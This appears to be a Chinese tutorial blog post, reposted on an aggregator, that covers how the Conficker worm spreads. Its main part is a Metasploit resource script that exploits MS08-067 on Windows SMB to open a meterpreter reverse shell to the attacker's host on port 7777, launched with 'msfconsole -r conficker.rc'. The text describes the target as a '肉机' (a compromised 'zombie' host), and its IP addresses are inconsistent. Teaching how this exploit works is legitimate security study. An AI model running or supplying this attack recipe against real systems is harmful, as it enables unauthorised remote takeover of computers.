码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【Python脚本进阶】2.4、conficker蠕虫(上):Metasploit攻击Windows SMB服务


    目录

    一、简介

    1.1、分析:

    二、Metasploit攻击Windows SMB服务

    2.1、分析:

    2.2、示例:


    一、简介

    1.1、分析:

    在其基本的感染方法中, Conficker蠕虫使用了两种不同的攻击方法。

    1、利用了Windows服务器中一个服务的Oday漏洞。利用这个栈溢出漏洞, 蠕虫能在被感染的主机上执行shellcode并下载蠕虫。

    2、Conficker蠕虫暴力破解默认的管理员网络共享(ADMN$)的口令以获取肉机访问权。



    二、Metasploit攻击Windows SMB服务

    2.1、分析:

    利用Metasploit框架(http://metasploit.com/download/)简化攻击代码。作为一个开源计算机安全项目,很快就被广泛使用, 并且已经变成了一个漏洞利用代码的开发工具包。


    Metasploit能让渗透测试人员在标准化和脚本化的环境中运行数以千计的不同的计算机漏洞利用代码。在Con.ticker蠕虫中使用的漏洞曝光后不久, HDMoore就将一个有效的漏洞利用代码整合进了框架内—-MS08-067 _netapi

    2.2、示例:

    虽然攻击者可以通过交互驱动的方式使用Metasploit, 但Metasploit也能读取批处理脚本(re)完成攻击。在攻击时,Metasploit会顺序执行批处理文件中的命令。


    如使用ms08 _ 067 netapi (Conficker)攻击“ 肉机” (192.168.x.x), 使之与我们自己的主机192.168.xx.xx的7777端口建立一个反向shell

    1. use exploit/windows/smb/ms08_ 067_netapi
    2. set RHOST 192.168.x.x
    3. set PAYLOAD windows/meterpreter/reverse_tcp
    4. set LHOST 192.168.xx.xx
    5. set LPORT 7777
    6. exploit -j -z

    使用Metasploit进行攻击时, 先选好要用的漏洞利用代码(exploit/windows/smb/ms08 _ 067 _ netapi)

    选定目标,目标设置为192.168.1.37

    设定负载为windows/meterpreter/reverse _ tcp

    将反向连接的目标设为主机192.168.77.77, 端口为7777

    最后Metasploit去实施攻击。


    将上面这些代码保存为文件conficker.rc。只要输入命令msfconsole -r conficker.rc, 就能发起攻击。这条命令让Metasploit运行脚本conficker.rc中的指令。如果攻击成功, 会返回一个让我们能控制目标计算机的Windows 命令行shell。

  • 相关阅读:
    java毕业设计——基于java+Jsoup+HttpClient的网络爬虫技术的网络新闻分析系统设计与实现——网络新闻分析系统
    Android13系统启动异常,卡在动画界面
    python pygame入门 - 安装测试篇
    【Leetcode】1259. Handshakes That Don‘t Cross
    MD格式字符串中的超链接改为打开新页面跳转
    IP-Guard申请外发流程说明步骤
    详解设计模式:观察者模式
    IDEA快捷键和模板
    客厅、厨房、卫生间瓷砖怎么挑选,看完不再烦恼!福州中宅装饰,福州装修
    MySQL的基本操作(超详细)
  • 原文地址:https://blog.csdn.net/qq_53079406/article/details/126077115
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号